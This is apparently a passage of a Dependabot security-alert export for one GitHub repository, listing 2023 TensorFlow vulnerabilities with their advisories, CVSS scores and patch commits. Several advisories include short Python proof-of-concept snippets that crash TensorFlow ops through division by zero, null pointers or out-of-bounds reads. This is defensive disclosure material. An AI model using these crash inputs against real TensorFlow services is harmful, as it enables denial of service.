                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/378",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/378",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 377,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-f637-vh3r-vfh2",
            "cve_id": "CVE-2023-25666",
            "summary": "TensorFlow has Floating Point Exception in AudioSpectrogram ",
            "description": "### Impact\nversion:2.11.0 //core/ops/audio_ops.cc:70\n\nStatus SpectrogramShapeFn(InferenceContext* c) { ShapeHandle input; TF_RETURN_IF_ERROR(c->WithRank(c->input(0), 2, &input)); int32_t window_size; TF_RETURN_IF_ERROR(c->GetAttr(\"window_size\", &window_size)); int32_t stride; TF_RETURN_IF_ERROR(c->GetAttr(\"stride\", &stride)); .....[1]\n\nDimensionHandle input_length = c->Dim(input, 0); DimensionHandle input_channels = c->Dim(input, 1);\n\nDimensionHandle output_length; if (!c->ValueKnown(input_length)) { output_length = c->UnknownDim(); } else { const int64_t input_length_value = c->Value(input_length); const int64_t length_minus_window = (input_length_value - window_size); int64_t output_length_value; if (length_minus_window < 0) { output_length_value = 0; } else { output_length_value = 1 + (length_minus_window / stride); .....[2] } output_length = c->MakeDim(output_length_value); }\n\nGet the value of stride at [1], and the used at [2]\n```python\nimport tensorflow as tf\n\npara = {'input': tf.constant([[14.], [24.]], dtype=tf.float32), 'window_size': 1, 'stride': 0, 'magnitude_squared': False}\nfunc = tf.raw_ops.AudioSpectrogram\n\n@tf.function(jit_compile=True)\ndef fuzz_jit():\n   y = func(**para)\n   return y\n\nfuzz_jit()\n```\n\n### Patches\nWe have patched the issue in GitHub commit [d0d4e779da0d0f56499c6fa5ba09f0a576cc6b14](https://github.com/tensorflow/tensorflow/commit/d0d4e779da0d0f56499c6fa5ba09f0a576cc6b14).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-f637-vh3r-vfh2",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25666",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f637-vh3r-vfh2"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/d0d4e779da0d0f56499c6fa5ba09f0a576cc6b14"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25666"
                },
                {
                    "url": "https://github.com/advisories/GHSA-f637-vh3r-vfh2"
                }
            ],
            "published_at": "2023-03-24T21:57:18Z",
            "updated_at": "2023-03-27T22:01:35Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-697",
                    "name": "Incorrect Comparison"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/377",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/377",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 376,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-fqm2-gh8w-gr68",
            "cve_id": "CVE-2023-25667",
            "summary": "TensorFlow vulnerable to segfault when opening multiframe gif",
            "description": "### Impact\nInteger overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example Full HD screencast of at least 346 frames.\n```python\nimport urllib.request\ndat = urllib.request.urlopen('https://raw.githubusercontent.com/tensorflow/tensorflow/1c38ad9b78ffe06076745a1ee00cec42f39ff726/tensorflow/core/lib/gif/testdata/3g_multiframe.gif').read()\nimport tensorflow as tf\ntf.io.decode_gif(dat)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d](https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Andrei\n",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-fqm2-gh8w-gr68",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25667",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fqm2-gh8w-gr68"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25667"
                },
                {
                    "url": "https://github.com/advisories/GHSA-fqm2-gh8w-gr68"
                }
            ],
            "published_at": "2023-03-24T21:57:09Z",
            "updated_at": "2023-03-27T22:02:12Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
                "score": 6.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-190",
                    "name": "Integer Overflow or Wraparound"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/376",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/376",
        "created_at": "2024-05-24T01:35:11Z",
        "updated_at": "2024-05-24T01:35:11Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 375,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-gw97-ff7c-9v96",
            "cve_id": "CVE-2023-25668",
            "summary": "TensorFlow has a heap out-of-buffer read vulnerability in the QuantizeAndDequantize operation",
            "description": "### Impact\nAttackers using Tensorflow can exploit the vulnerability. They can access heap memory which is not in the control of user, leading to a crash or RCE.\nWhen axis is larger than the dim of input, c->Dim(input,axis) goes out of bound.\nSame problem occurs in the QuantizeAndDequantizeV2/V3/V4/V4Grad operations too.\n```python\nimport tensorflow as tf\n@tf.function\ndef test():\n    tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5],\n    \t\t\t\t\t\t\t\t   input_min=[1.0],\n    \t\t\t\t\t\t\t\t   input_max=[10.0],\n    \t\t\t\t\t\t\t\t   signed_input=True,\n    \t\t\t\t\t\t\t\t   num_bits=1,\n    \t\t\t\t\t\t\t\t   range_given=True,\n    \t\t\t\t\t\t\t\t   round_mode='HALF_TO_EVEN',\n    \t\t\t\t\t\t\t\t   narrow_range=True,\n    \t\t\t\t\t\t\t\t   axis=0x7fffffff)\ntest()\n```\n\n\n\n### Patches\nWe have patched the issue in GitHub commit [7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb](https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n",
            "severity": "critical",
            "identifiers": [
                {
                    "value": "GHSA-gw97-ff7c-9v96",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25668",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gw97-ff7c-9v96"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25668"
                },
                {
                    "url": "https://github.com/advisories/GHSA-gw97-ff7c-9v96"
                }
            ],
            "published_at": "2023-03-24T21:57:01Z",
            "updated_at": "2023-03-27T22:03:47Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "critical",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "critical",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "critical",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "score": 9.8
            },
            "cwes": [
                {
                    "cwe_id": "CWE-122",
                    "name": "Heap-based Buffer Overflow"
                },
                {
                    "cwe_id": "CWE-125",
                    "name": "Out-of-bounds Read"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "critical",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/375",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/375",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 374,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-rcf8-g8jv-vg6p",
            "cve_id": "CVE-2023-25669",
            "summary": "TensorFlow has Floating Point Exception in AvgPoolGrad with XLA",
            "description": "### Impact\nIf the stride and window size are not positive for `tf.raw_ops.AvgPoolGrad`, it can give an FPE.\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\n@tf.function(jit_compile=True)\ndef test():\n   y = tf.raw_ops.AvgPoolGrad(orig_input_shape=[1,0,0,0], grad=[[[[0.39117979]]]], ksize=[1,0,0,0], strides=[1,0,0,0], padding=\"SAME\", data_format=\"NCHW\")\n   return y\n\nprint(test())\n```\n\n### Patches\nWe have patched the issue in GitHub commit [1295ae4dbb52fe06b19733b0257e2340d7b63b8d](https://github.com/tensorflow/tensorflow/commit/1295ae4dbb52fe06b19733b0257e2340d7b63b8d).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx of 360 AIVul Team\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-rcf8-g8jv-vg6p",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25669",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rcf8-g8jv-vg6p"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/1295ae4dbb52fe06b19733b0257e2340d7b63b8d"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25669"
                },
                {
                    "url": "https://github.com/advisories/GHSA-rcf8-g8jv-vg6p"
                }
            ],
            "published_at": "2023-03-24T21:56:53Z",
            "updated_at": "2023-03-30T22:16:24Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-697",
                    "name": "Incorrect Comparison"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/374",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/374",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 373,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-49rq-hwc3-x77w",
            "cve_id": "CVE-2023-25670",
            "summary": "TensorFlow has Null Pointer Error in QuantizedMatMulWithBiasAndDequantize",
            "description": "### Impact\nNPE in QuantizedMatMulWithBiasAndDequantize with MKL enable \n```python\nimport tensorflow as tf\n\nfunc = tf.raw_ops.QuantizedMatMulWithBiasAndDequantize\npara={'a': tf.constant(138, dtype=tf.quint8), 'b': tf.constant(4, dtype=tf.qint8), 'bias': [[31.81644630432129, 47.21876525878906], [109.95201110839844, 152.07968139648438]], 'min_a': 141.5337138686371, 'max_a': [73.84139251708984, 173.15280151367188], 'min_b': [], 'max_b': [[16.128345489501953, 193.26820373535156]], 'min_freezed_output': [], 'max_freezed_output': [115.50032806396484, 156.974853515625], 'Toutput': 1.0, 'transpose_a': True, 'transpose_b': False, 'input_quant_mode': 'MIN_FIRST'}\n\nfunc(**para)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [8a47a39d9697969206d23a523c977238717e8727](https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-49rq-hwc3-x77w",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25670",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-49rq-hwc3-x77w"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25670"
                },
                {
                    "url": "https://github.com/advisories/GHSA-49rq-hwc3-x77w"
                }
            ],
            "published_at": "2023-03-24T21:55:32Z",
            "updated_at": "2023-03-30T22:17:28Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/373",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/373",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 372,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-j5w9-hmfh-4cr6",
            "cve_id": "CVE-2023-25671",
            "summary": "TensorFlow has segmentation fault in tfg-translate ",
            "description": "### Impact\nOut-of-bounds access due to mismatched integer type sizes in ValueMap::Manager::GetValueOrCreatePlaceholder. Bug with tfg-translate call to InitMlir. The problem happens with generic functions, as it is already handled for non-generic functions. This is because they, unlike non-generic functions, are using the \"old importer\". A better long-term solution may be to have the \"new importer\" handle generic functions.\n\n### Patches\nWe have patched the issue in GitHub\n- commit [760322a71ac9033e122ef1f4b1c62813021e5938](https://github.com/tensorflow/tensorflow/commit/760322a71ac9033e122ef1f4b1c62813021e5938).\n- commit [2eedc8f676d2c3b8be9492e547b2bc814c10b367](https://github.com/tensorflow/tensorflow/commit/2eedc8f676d2c3b8be9492e547b2bc814c10b367)\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx\n\n### Affiliation\n360 AIVul\n\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-j5w9-hmfh-4cr6",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25671",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j5w9-hmfh-4cr6"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/2eedc8f676d2c3b8be9492e547b2bc814c10b367"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/760322a71ac9033e122ef1f4b1c62813021e5938"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25671"
                },
                {
                    "url": "https://github.com/advisories/GHSA-j5w9-hmfh-4cr6"
                }
            ],
            "published_at": "2023-03-24T21:55:07Z",
            "updated_at": "2023-03-31T16:06:04Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-787",
                    "name": "Out-of-bounds Write"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/372",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/372",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 371,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-94mm-g2mv-8p7r",
            "cve_id": "CVE-2023-25672",
            "summary": "TensorFlow has Null Pointer Error in LookupTableImportV2",
            "description": "### Impact\nThe function `tf.raw_ops.LookupTableImportV2` cannot handle scalars in the `values` parameter and gives an NPE.\n\n```python\nimport tensorflow as tf\n\nv = tf.Variable(1)\n\n@tf.function(jit_compile=True)\ndef test():\n   func = tf.raw_ops.LookupTableImportV2\n   para={'table_handle': v.handle,'keys': [62.98910140991211, 94.36528015136719], 'values': -919}\n\n   y = func(**para)\n   return y\n\nprint(test())\n```\n\n### Patches\nWe have patched the issue in GitHub commit [980b22536abcbbe1b4a5642fc940af33d8c19b69](https://github.com/tensorflow/tensorflow/commit/980b22536abcbbe1b4a5642fc940af33d8c19b69).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx of 360 AIVul Team\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-94mm-g2mv-8p7r",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25672",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-94mm-g2mv-8p7r"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/980b22536abcbbe1b4a5642fc940af33d8c19b69"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25672"
                },
                {
                    "url": "https://github.com/advisories/GHSA-94mm-g2mv-8p7r"
                }
            ],
            "published_at": "2023-03-24T21:54:55Z",
            "updated_at": "2023-03-30T16:59:15Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/371",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/371",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 370,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-647v-r7qq-24fh",
            "cve_id": "CVE-2023-25673",
            "summary": "TensorFlow has Floating Point Exception in TensorListSplit with XLA ",
            "description": "### Impact\nFPE in TensorListSplit with XLA \n```python\nimport tensorflow as tf\n\nfunc = tf.raw_ops.TensorListSplit\npara = {'tensor': [1], 'element_shape': -1, 'lengths': [0]}\n\n@tf.function(jit_compile=True)\ndef fuzz_jit():\n y = func(**para)\n return y\n\nprint(fuzz_jit())\n```\n\n### Patches\nWe have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-647v-r7qq-24fh",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25673",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-647v-r7qq-24fh"
                },
